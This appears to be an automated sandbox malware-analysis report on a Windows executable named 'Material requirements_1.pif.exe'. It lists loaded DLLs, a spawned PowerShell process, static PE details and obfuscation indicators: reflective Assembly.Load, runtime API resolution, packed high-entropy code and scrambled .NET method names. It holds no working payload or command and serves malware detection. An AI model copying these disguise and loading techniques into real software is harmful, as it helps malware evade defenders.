                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.iniJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: Material requirements_1.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Material requirements_1.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Material requirements_1.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: VpNo.pdbSHA256+ source: Material requirements_1.pif.exe
                Source: Binary string: VpNo.pdb source: Material requirements_1.pif.exe

Data Obfuscation
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.cs.Net Code: LN6dLkddfT System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.cs.Net Code: LN6dLkddfT System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.70b0000.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.2d94fd0.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.cs.Net Code: LN6dLkddfT System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCF3
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_02D09C61 push 14052993h; iretd 0_2_02D09C6D
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00434006 push ecx; ret 7_2_00434019
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004567F0 push eax; ret 7_2_0045680E
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0045B9DD push esi; ret 7_2_0045B9E6
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00463EF3 push ds; retf 7_2_00463EEC
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00455EBF push ecx; ret 7_2_00455ED2
                Source: Material requirements_1.pif.exeStatic PE information: section name: .text entropy: 7.965477253296922
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, EXjeaLC6h752HH7SeQ.csHigh entropy of concatenated method names: 'TFLq6AxL1o', 'PFdqPKE5v3', 'gsPqkyHQoj', 'pY1qMWFbrm', 'q8GqeaOksl', 'mK8q1JHFxP', 'P4Eq259jhj', 'qIMquC5hd7', 'NxXqRjjM3Z', 'imGqpoU9Kj'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.csHigh entropy of concatenated method names: 'AZuF0V4pVe', 'dVlFJknnI8', 'LVXFqePZDR', 'mgwFx6tFAl', 'woTFc1Wamb', 'VRPFO4QgVd', 'rBBFKEYi3w', 'vN5FnNWufU', 'rtdFTE6t0l', 'oCQF3XIu5n'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, ODy3AcyoxB4Nfbptyy.csHigh entropy of concatenated method names: 'N72xVB9kVx', 'IP7xD7SKOw', 'GmFxCBeBIS', 'jxFxybOjy6', 'GCxx8CXB44', 'FqPx93A5lx', 'apkxGv7X74', 'qjHxjWMbUJ', 'O7SxwTv85d', 'WwqxWNEx7V'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, c5MoKBUq8qvmpdLPkr.csHigh entropy of concatenated method names: 'RM8O0lJpm6', 'qf4OqAP7pH', 'qeZOcitTqd', 'gOpOKpGgRV', 's6dOnnBKhC', 'irDce3yiXE', 'gvxc1hNpZ5', 'pgjc2r1qiJ', 'NXicu1OKqV', 'NR0cRZZwVG'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, hSx5Fvf2t2qMkrPqAm.csHigh entropy of concatenated method names: 'KepOr02QUK', 'sjtO4GrVWI', 'OwZOLKEPIg', 'bXiOVCsmxj', 'a7LODH5yhP', 'HpoObPBFY0', 'vXrOyyf1ql', 'IC3OSD9HEP', 'tKnZVZm5ooucld23Jfh', 'ls0oQZmnDQPunTd28tU'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, aISE6MkWVU1tHktetQ.csHigh entropy of concatenated method names: 'ToString', 'ScF9tnqnss', 'lg19XSjeZM', 'JdL9hcW3JX', 'vDR9fp1mVg', 'mEy9sbvgWL', 'AYn9NlA8Kk', 'bUc9gok9uM', 'vvr95gq11u', 'h8e9i9gwMl'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, xmYKJGAI6uNbPA6FLl.csHigh entropy of concatenated method names: 'KsMQCjP8yY', 'lgAQywpRWy', 'YtnQUeds0m', 'S7TQXqEuBJ', 'qtDQfRJ8sb', 'LB5Qs98bEb', 'cSyQgrJ3x4', 'Fs1Q5eN3B4', 'hnGQBM9BuW', 'cPqQtdO6UG'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, Q2qYfI6wmsZigOBGuZ.csHigh entropy of concatenated method names: 'FW98BTg6wT', 'F4e8YwX87m', 'FqM86wUHKK', 'vWU8PrlgPA', 'YXE8XfxK9G', 'IlQ8hDSxuJ', 'AJA8f0ywWK', 'iTV8sEMuqY', 'F278N6I7ad', 'nT58gEaBf8'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, bRGCNDiLG7EYfq4xZj.csHigh entropy of concatenated method names: 'aEYK42t9In', 'nNPKH0745U', 'qkVKLAYjby', 'ujmKV3vjuS', 'iUDKlCXOFP', 'CvNKDoRloW', 'HnvKbsxgFI', 'sqvKCFy6rP', 'NK8KylTiD7', 'vDjKSvPEq4'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, llx0TaqgR8TBmw4VB1.csHigh entropy of concatenated method names: 'Dispose', 'QBSmR7giCC', 'NdJaXaffhG', 'vAQxvMgZ1i', 'T91mpGVTtN', 'TC6mzt2JCd', 'ProcessDialogKey', 'cw7aoT6jPT', 'mvCam5B0IB', 'k6MaaouI0l'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, lW7pBiMxd5BWrJjUJI.csHigh entropy of concatenated method names: 'JXvG3hwEn9', 'MHbGZbTNFF', 'ToString', 'WyWGJJnTWe', 'q9CGqjfRUs', 'NNAGxOi13Z', 'AS6GcVcITs', 'mgoGO7d07y', 'HJfGKCRwAN', 'hZmGnpHCK7'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, vT6jPTRZvC5B0IBT6M.csHigh entropy of concatenated method names: 'O5LwUuQIZ6', 'LBDwXGDySg', 'xxpwhHeca5', 'J8gwfXKQxg', 'yQfwsWpdZM', 'qNVwNc6jD4', 'sZ6wgcXYgW', 'FZEw5WunDX', 'ufEwiZNuUZ', 'OwZwBqfrwf'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, omvIrPmob14E5fcrVR8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EsYWt0hBJC', 'OZ3WYRj5iJ', 'YP8WAZHUCA', 'KX4W6Gi4kW', 'W0RWPC3UDl', 'rrYWkmpRnd', 'aGEWMP0n7Q'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, zKIuKsxf8qPDckMuAw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FvvaRSIgp6', 'gQpapHNXrx', 'ksqazadPPI', 'I28FoK5lnF', 'bkpFmm5BJC', 'l2cFa682rS', 'CJMFF9tJX5', 'RWCVefb0IAwxa03BdGv'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, X4l6jezAlWdqIXtk64.csHigh entropy of concatenated method names: 'rPLWDSGWiG', 'hksWCdlhpa', 'OxZWyYCuQ2', 'cicWUHkD0C', 'hJoWXJ04k9', 'z84WfR8LUr', 'cf3WsswSKB', 'Em2Wr5Lvum', 'LAsW4jl2tT', 'vleWHAHdfJ'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, hoe2Wddu8RsTrfs01r.csHigh entropy of concatenated method names: 'AGymKXjeaL', 'Rh7mn52HH7', 'ioxm3B4Nfb', 'YtymZyxk8X', 'Tvvm8vBF5M', 'aKBm9q8qvm', 'BLFdi49QZ2kvO9mP5Z', 'AkBkhuKS4jY4S40mkb', 'a78mmx5yxd', 'xpvmF6m8p3'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, DNkgN82fNABS7giCCM.csHigh entropy of concatenated method names: 'IZ9w8gEnQA', 'L4BwGoyEAY', 'v8gwwtmhd7', 'XxIwINVwwe', 'h5hwvFhQQM', 'ocFwrRX3iE', 'Dispose', 'FUPjJaIdcy', 'rWWjqSNGrg', 'z8sjxayVk5'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, gn6YHxgUYnQMt9eQgY.csHigh entropy of concatenated method names: 'VffKJdggpC', 'DcXKxhJg31', 'vg5KOwRqvw', 'sZ9OpG2Sdv', 'Tb7Oz5hvYZ', 'OQuKok0UC5', 'sQGKmKddBo', 'dTQKaJejov', 'pnOKF5xyuB', 'i6cKdDWkGf'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, MO4jLka0yHQyk46IRI.csHigh entropy of concatenated method names: 'wWTLTli2L', 'cEeV0mT27', 'eeiDQhsFU', 'qjGb4KiAP', 'rYXyrkV4c', 'lu7SGlG0B', 'vej1qWJmShifR6c9HN', 'bvUAHs2xMgZDO9vL6c', 'LVojS40qW', 'SmgWbQiDE'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, q0X39GmmtPhntPZMeBf.csHigh entropy of concatenated method names: 'ACVWpuxh8p', 'AZAWzy19O0', 'XATIoaQ3vg', 'xdCIm2GZ6K', 'YxhIaBpyFC', 'qCUIFll8df', 'MjEIdOUiR6', 'IcnI0d5pvB', 'QQsIJCLfJ9', 'sAhIqW5bbB'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, mPifxm1D3vFDQQOTHw.csHigh entropy of concatenated method names: 'LPFGuk5rat', 'OyNGpacJFF', 'UQAjoaSgSp', 'SbQjmLuKuR', 'bw3GtjsiUJ', 'Q3kGYOSANI', 'vnCGAHvN0F', 'cRjG62Bbiv', 'BNHGPFAPUw', 'KnTGky1M6N'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, EXjeaLC6h752HH7SeQ.csHigh entropy of concatenated method names: 'TFLq6AxL1o', 'PFdqPKE5v3', 'gsPqkyHQoj', 'pY1qMWFbrm', 'q8GqeaOksl', 'mK8q1JHFxP', 'P4Eq259jhj', 'qIMquC5hd7', 'NxXqRjjM3Z', 'imGqpoU9Kj'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.csHigh entropy of concatenated method names: 'AZuF0V4pVe', 'dVlFJknnI8', 'LVXFqePZDR', 'mgwFx6tFAl', 'woTFc1Wamb', 'VRPFO4QgVd', 'rBBFKEYi3w', 'vN5FnNWufU', 'rtdFTE6t0l', 'oCQF3XIu5n'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, ODy3AcyoxB4Nfbptyy.csHigh entropy of concatenated method names: 'N72xVB9kVx', 'IP7xD7SKOw', 'GmFxCBeBIS', 'jxFxybOjy6', 'GCxx8CXB44', 'FqPx93A5lx', 'apkxGv7X74', 'qjHxjWMbUJ', 'O7SxwTv85d', 'WwqxWNEx7V'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, c5MoKBUq8qvmpdLPkr.csHigh entropy of concatenated method names: 'RM8O0lJpm6', 'qf4OqAP7pH', 'qeZOcitTqd', 'gOpOKpGgRV', 's6dOnnBKhC', 'irDce3yiXE', 'gvxc1hNpZ5', 'pgjc2r1qiJ', 'NXicu1OKqV', 'NR0cRZZwVG'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, hSx5Fvf2t2qMkrPqAm.csHigh entropy of concatenated method names: 'KepOr02QUK', 'sjtO4GrVWI', 'OwZOLKEPIg', 'bXiOVCsmxj', 'a7LODH5yhP', 'HpoObPBFY0', 'vXrOyyf1ql', 'IC3OSD9HEP', 'tKnZVZm5ooucld23Jfh', 'ls0oQZmnDQPunTd28tU'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, aISE6MkWVU1tHktetQ.csHigh entropy of concatenated method names: 'ToString', 'ScF9tnqnss', 'lg19XSjeZM', 'JdL9hcW3JX', 'vDR9fp1mVg', 'mEy9sbvgWL', 'AYn9NlA8Kk', 'bUc9gok9uM', 'vvr95gq11u', 'h8e9i9gwMl'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, xmYKJGAI6uNbPA6FLl.csHigh entropy of concatenated method names: 'KsMQCjP8yY', 'lgAQywpRWy', 'YtnQUeds0m', 'S7TQXqEuBJ', 'qtDQfRJ8sb', 'LB5Qs98bEb', 'cSyQgrJ3x4', 'Fs1Q5eN3B4', 'hnGQBM9BuW', 'cPqQtdO6UG'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, Q2qYfI6wmsZigOBGuZ.csHigh entropy of concatenated method names: 'FW98BTg6wT', 'F4e8YwX87m', 'FqM86wUHKK', 'vWU8PrlgPA', 'YXE8XfxK9G', 'IlQ8hDSxuJ', 'AJA8f0ywWK', 'iTV8sEMuqY', 'F278N6I7ad', 'nT58gEaBf8'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, bRGCNDiLG7EYfq4xZj.csHigh entropy of concatenated method names: 'aEYK42t9In', 'nNPKH0745U', 'qkVKLAYjby', 'ujmKV3vjuS', 'iUDKlCXOFP', 'CvNKDoRloW', 'HnvKbsxgFI', 'sqvKCFy6rP', 'NK8KylTiD7', 'vDjKSvPEq4'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, llx0TaqgR8TBmw4VB1.csHigh entropy of concatenated method names: 'Dispose', 'QBSmR7giCC', 'NdJaXaffhG', 'vAQxvMgZ1i', 'T91mpGVTtN', 'TC6mzt2JCd', 'ProcessDialogKey', 'cw7aoT6jPT', 'mvCam5B0IB', 'k6MaaouI0l'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, lW7pBiMxd5BWrJjUJI.csHigh entropy of concatenated method names: 'JXvG3hwEn9', 'MHbGZbTNFF', 'ToString', 'WyWGJJnTWe', 'q9CGqjfRUs', 'NNAGxOi13Z', 'AS6GcVcITs', 'mgoGO7d07y', 'HJfGKCRwAN', 'hZmGnpHCK7'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, vT6jPTRZvC5B0IBT6M.csHigh entropy of concatenated method names: 'O5LwUuQIZ6', 'LBDwXGDySg', 'xxpwhHeca5', 'J8gwfXKQxg', 'yQfwsWpdZM', 'qNVwNc6jD4', 'sZ6wgcXYgW', 'FZEw5WunDX', 'ufEwiZNuUZ', 'OwZwBqfrwf'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, omvIrPmob14E5fcrVR8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EsYWt0hBJC', 'OZ3WYRj5iJ', 'YP8WAZHUCA', 'KX4W6Gi4kW', 'W0RWPC3UDl', 'rrYWkmpRnd', 'aGEWMP0n7Q'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, zKIuKsxf8qPDckMuAw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FvvaRSIgp6', 'gQpapHNXrx', 'ksqazadPPI', 'I28FoK5lnF', 'bkpFmm5BJC', 'l2cFa682rS', 'CJMFF9tJX5', 'RWCVefb0IAwxa03BdGv'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, X4l6jezAlWdqIXtk64.csHigh entropy of concatenated method names: 'rPLWDSGWiG', 'hksWCdlhpa', 'OxZWyYCuQ2', 'cicWUHkD0C', 'hJoWXJ04k9', 'z84WfR8LUr', 'cf3WsswSKB', 'Em2Wr5Lvum', 'LAsW4jl2tT', 'vleWHAHdfJ'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, hoe2Wddu8RsTrfs01r.csHigh entropy of concatenated method names: 'AGymKXjeaL', 'Rh7mn52HH7', 'ioxm3B4Nfb', 'YtymZyxk8X', 'Tvvm8vBF5M', 'aKBm9q8qvm', 'BLFdi49QZ2kvO9mP5Z', 'AkBkhuKS4jY4S40mkb', 'a78mmx5yxd', 'xpvmF6m8p3'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, DNkgN82fNABS7giCCM.csHigh entropy of concatenated method names: 'IZ9w8gEnQA', 'L4BwGoyEAY', 'v8gwwtmhd7', 'XxIwINVwwe', 'h5hwvFhQQM', 'ocFwrRX3iE', 'Dispose', 'FUPjJaIdcy', 'rWWjqSNGrg', 'z8sjxayVk5'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, gn6YHxgUYnQMt9eQgY.csHigh entropy of concatenated method names: 'VffKJdggpC', 'DcXKxhJg31', 'vg5KOwRqvw', 'sZ9OpG2Sdv', 'Tb7Oz5hvYZ', 'OQuKok0UC5', 'sQGKmKddBo', 'dTQKaJejov', 'pnOKF5xyuB', 'i6cKdDWkGf'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, MO4jLka0yHQyk46IRI.csHigh entropy of concatenated method names: 'wWTLTli2L', 'cEeV0mT27', 'eeiDQhsFU', 'qjGb4KiAP', 'rYXyrkV4c', 'lu7SGlG0B', 'vej1qWJmShifR6c9HN', 'bvUAHs2xMgZDO9vL6c', 'LVojS40qW', 'SmgWbQiDE'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, q0X39GmmtPhntPZMeBf.csHigh entropy of concatenated method names: 'ACVWpuxh8p', 'AZAWzy19O0', 'XATIoaQ3vg', 'xdCIm2GZ6K', 'YxhIaBpyFC', 'qCUIFll8df', 'MjEIdOUiR6', 'IcnI0d5pvB', 'QQsIJCLfJ9', 'sAhIqW5bbB'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, mPifxm1D3vFDQQOTHw.csHigh entropy of concatenated method names: 'LPFGuk5rat', 'OyNGpacJFF', 'UQAjoaSgSp', 'SbQjmLuKuR', 'bw3GtjsiUJ', 'Q3kGYOSANI', 'vnCGAHvN0F', 'cRjG62Bbiv', 'BNHGPFAPUw', 'KnTGky1M6N'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, EXjeaLC6h752HH7SeQ.csHigh entropy of concatenated method names: 'TFLq6AxL1o', 'PFdqPKE5v3', 'gsPqkyHQoj', 'pY1qMWFbrm', 'q8GqeaOksl', 'mK8q1JHFxP', 'P4Eq259jhj', 'qIMquC5hd7', 'NxXqRjjM3Z', 'imGqpoU9Kj'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.csHigh entropy of concatenated method names: 'AZuF0V4pVe', 'dVlFJknnI8', 'LVXFqePZDR', 'mgwFx6tFAl', 'woTFc1Wamb', 'VRPFO4QgVd', 'rBBFKEYi3w', 'vN5FnNWufU', 'rtdFTE6t0l', 'oCQF3XIu5n'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, ODy3AcyoxB4Nfbptyy.csHigh entropy of concatenated method names: 'N72xVB9kVx', 'IP7xD7SKOw', 'GmFxCBeBIS', 'jxFxybOjy6', 'GCxx8CXB44', 'FqPx93A5lx', 'apkxGv7X74', 'qjHxjWMbUJ', 'O7SxwTv85d', 'WwqxWNEx7V'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, c5MoKBUq8qvmpdLPkr.csHigh entropy of concatenated method names: 'RM8O0lJpm6', 'qf4OqAP7pH', 'qeZOcitTqd', 'gOpOKpGgRV', 's6dOnnBKhC', 'irDce3yiXE', 'gvxc1hNpZ5', 'pgjc2r1qiJ', 'NXicu1OKqV', 'NR0cRZZwVG'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, hSx5Fvf2t2qMkrPqAm.csHigh entropy of concatenated method names: 'KepOr02QUK', 'sjtO4GrVWI', 'OwZOLKEPIg', 'bXiOVCsmxj', 'a7LODH5yhP', 'HpoObPBFY0', 'vXrOyyf1ql', 'IC3OSD9HEP', 'tKnZVZm5ooucld23Jfh', 'ls0oQZmnDQPunTd28tU'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, aISE6MkWVU1tHktetQ.csHigh entropy of concatenated method names: 'ToString', 'ScF9tnqnss', 'lg19XSjeZM', 'JdL9hcW3JX', 'vDR9fp1mVg', 'mEy9sbvgWL', 'AYn9NlA8Kk', 'bUc9gok9uM', 'vvr95gq11u', 'h8e9i9gwMl'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, xmYKJGAI6uNbPA6FLl.csHigh entropy of concatenated method names: 'KsMQCjP8yY', 'lgAQywpRWy', 'YtnQUeds0m', 'S7TQXqEuBJ', 'qtDQfRJ8sb', 'LB5Qs98bEb', 'cSyQgrJ3x4', 'Fs1Q5eN3B4', 'hnGQBM9BuW', 'cPqQtdO6UG'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, Q2qYfI6wmsZigOBGuZ.csHigh entropy of concatenated method names: 'FW98BTg6wT', 'F4e8YwX87m', 'FqM86wUHKK', 'vWU8PrlgPA', 'YXE8XfxK9G', 'IlQ8hDSxuJ', 'AJA8f0ywWK', 'iTV8sEMuqY', 'F278N6I7ad', 'nT58gEaBf8'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, bRGCNDiLG7EYfq4xZj.csHigh entropy of concatenated method names: 'aEYK42t9In', 'nNPKH0745U', 'qkVKLAYjby', 'ujmKV3vjuS', 'iUDKlCXOFP', 'CvNKDoRloW', 'HnvKbsxgFI', 'sqvKCFy6rP', 'NK8KylTiD7', 'vDjKSvPEq4'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, llx0TaqgR8TBmw4VB1.csHigh entropy of concatenated method names: 'Dispose', 'QBSmR7giCC', 'NdJaXaffhG', 'vAQxvMgZ1i', 'T91mpGVTtN', 'TC6mzt2JCd', 'ProcessDialogKey', 'cw7aoT6jPT', 'mvCam5B0IB', 'k6MaaouI0l'
